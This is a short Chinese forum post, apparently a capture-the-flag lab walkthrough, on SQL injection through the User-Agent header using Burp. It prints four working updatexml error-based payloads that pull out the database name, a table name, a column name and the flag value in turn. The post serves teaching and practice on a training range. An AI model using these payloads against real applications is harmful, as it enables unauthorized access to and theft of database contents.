6.5.1-SQL注入-Header注入Rank 1

繁夜   ·   发表于 2019-02-15 14:01:02   ·   技术文章投稿区

head注入其实就是一种注入方式 我们可以用burp抓包修改注入 先进入靶场


修改User-Agent:这行数据包


updataxml注入

' and updatexml(1,concat(0x7e,(select database()),0x7e),1),'','')#


然后爆表

' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e),1),'','')#


爆字段

' and updatexml(1,concat(0x7e,( select column_name from information_schema.columns where table_name= "zkaq" limit 0,1),0x7e),1),'','')#


拿flag

' and updatexml(1,concat(0x7e,( select zKaQ from zkaq limit 0,1),0x7e),1),'','')#

打赏我,让我更有动力~

0 Reply   |  Until 2019-2-15 | 854 View
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2022 掌控者 All Rights Reserved.